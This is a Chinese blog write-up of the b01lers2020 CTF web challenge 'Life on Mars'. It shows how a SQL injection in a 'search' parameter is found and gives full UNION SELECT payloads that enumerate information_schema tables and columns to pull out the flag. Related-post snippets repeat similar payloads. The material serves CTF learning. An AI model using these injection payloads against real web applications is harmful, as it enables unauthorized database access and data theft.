[b01lers2020]Life on Mars WRITE UP

最新推荐文章于 2023-04-02 21:47:58 发布
最新推荐文章于 2023-04-02 21:47:58 发布
阅读量433 收藏
点赞数 1
分类专栏: Write up
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43497161/article/details/108718133
版权

拿到网站没啥好说的,基本是静态的页面,先抓包。
在这里插入图片描述
发现包有问题,search参数 非常的奇怪 经初步判定有SQL注入

在这里插入图片描述
ORDER BY 2 得到 有两个参数

进行联合查询,得到所有数据库的名称

在这里插入图片描述
发现有个贼奇怪的 叫alien_code 进去看看

/query?search=amazonis_planitia%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27alien_code%27
在这里插入图片描述
发现有一个表叫做 code

查表中字段
/query?search=amazonis_planitia%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27code%27
在这里插入图片描述
flag就藏在code中
轻松拿到flag
在这里插入图片描述

_SWEE_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF逆向-[b01lers2020]little_engine-cpp基本函数用法和byte类型要点
serfend's blog
05-08 1524
CTF逆向-[b01lers2020]little_engine-cpp基本函数用法和byte类型要点 来源:https://buuoj.cn/ 内容: 附件:https://pan.baidu.com/s/1g6wnqkuqydzHHlXInmRCNQ?pwd=mjlu 提取码:mjlu 答案:pctf{th3_m0d3rn_st34m_3ng1n3_w45_1nv3nt3d_1n_1698_buT_th3_b3st_0n3_in_1940} 总体思路 发现主要流程三个函数,分别是输出一个欢迎语、要求用
BUUCTF:[b01lers2020]image_adjustments
末初的CSDN博客
04-21 1145
https://buuoj.cn/challenges#[b01lers2020]image_adjustments https://github.com/b01lers/b01lers-ctf-2020/tree/master/misc/image_adjustments adjust.py #!/usr/bin/env python3 from PIL import Image from random import randint import sys f = './flag.png' im
[b01lers2020]Life on Mars 1
最新发布
m0_73728268的博客
04-02 132
sqlmap
[b01lers2020]Life on Mars (难发现的sql注入)
qq_62046696的博客
11-21 566
打开界面以后,查看各种都没有提示,果断扫描目录,但也是没获得什么。到这里只能burp抓个包看看 抓包两个界面发现了get传参,考虑是否存在sql注入尝试额以后发现只返回了一个1,试一下别的引号闭合 直接进行查询所有的数据库名 看一下alien_code数据库 发现code表 ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.cod
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2937
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。 您将找到以下目录: rev:Rev的挑战 pwn:Pwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 分布式文件:我们在CTF期间分发供下载的tgz文件 以及比赛的比分牌。 ...
FZHei-B01.zip
05-13
"FZHei-B01.zip"这个压缩包文件提供了一款名为"FZHei-B01"的字体,专为Windows操作系统下的LaTeX环境设计。这款字体是方正黑体系列的一部分,具有清晰、简洁的黑体风格,适用于各种文档和图形的排版。 LaTeX是一种...
otp_win64_R15B01.rar
08-13
标题中的"otp_win64_R15B01.rar"是一个RAR格式的压缩文件,它包含的是OTP(Open Telecom Platform)在Windows 64位操作系统上的版本R15B01。OTP是Ericsson公司开发的一个开源软件框架,主要用于构建可靠、可扩展和...
otp_win32_R15B01.rar
08-13
标题中的"otp_win32_R15B01.rar"是一个RAR格式的压缩文件,它包含了一个名为"otp_win32_R15B01"的程序或软件包。OTP,全称是“One-Time Password”,通常指的是在安全领域中使用的一次性密码技术,用于增强账户的...
电子水墨屏ALFG0290B01
11-30
电子水墨屏ALFG0290B01的规格书,里面详细介绍了屏的使用和尺寸
BUU刷题记录——7
weixin_43610673的博客
02-20 3413
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎杯 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不传值得话就可以进入if语句,跟进_fo
[b01lers2020]Life on Mars
qq_54929891的博客
04-22 252
点进去可以看见是类似于日记一样的 起初我以为是那种唬人的,flag在每个主题里面,NO 扫描目录,无东西 看源码,无hint 通过抓包跳转发现有东西 有参数! 把search改为1会回显1,改为2还是1,于是在想利用之前那个地点来试试可不可以联合注入 发现成功回显了1,2,看来这就是一个注入题目了,试试database() 数据库aliens union select 1,group_concat(table_name) from information_schema.t...
crypto-dollar_lunch(b01lers ctf 2020)
耐酸碱高温固化材料近距离传输研究
12-28 557
一题比较特殊的RSA题,记录一下。已知N,phi,e解密
BUUCTF 打卡7
qq_52193383的博客
08-27 510
1.[NPUCTF2020]共 模 攻 击 给出两个代码。先解hint.py(毕竟解出来的东西是提示)。可以看出这里面含有共模攻击,解出c之后,我们就掌握了密文c,模数p,指数(256),再利用sympy.nthroot_mod(c,256,p)解出明文m。 import sympy,gmpy2 from Crypto.Util.number import * p = 1073169757712843421083629549450964897089003026337345209439052836552833
BUUCTF-CRYPTO-[b01lers2020]safety_in_numbers
zippo1234的博客
10-26 937
BUUCTF-CRYPTO-[b01lers2020]safety_in_numbers[b01lers2020]safety_in_numbers题目分析开始1.题目2.分析(1)pubkey.pem(2)小端存储(3)解法3.上脚本:4.get flag结语 每天一题,只能多不能少 [b01lers2020]safety_in_numbers 题目分析 1.pub.pem读取 2.n很大,或者说m^e相比于n很小。 开始 1.题目 给了三个文件 pubke.pem储存了n和e。 flag.enc是加密
[b01lers2020]chugga_chugga
qq_39642801的博客
08-02 463
先用GDB运行一下,运行到用户输入后用bt指令查看堆栈情况,得知main函数位置 用IDA打开main函数,从中可以大致得知变量所代表的含义 用个带行号的文本编辑器进行填充,发现flag中只有一部分是以明文形式给出(X,Y代表字符相同) pctf{s4d_cXXYY4_nXXzXz} 直接暴力求解 ...
MG1561B01-6显示屏规格书-2021年版
本资源是一份名为"MG1561B01-6__Product_Spec_Ver_2.1_20211009.pdf"的产品规格书,由深圳市中兴星辰光电技术有限公司所有,版权受到保护,禁止未经授权的使用。该规格书主要针对型号为MG1561B01-6的产品,版本为2.1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值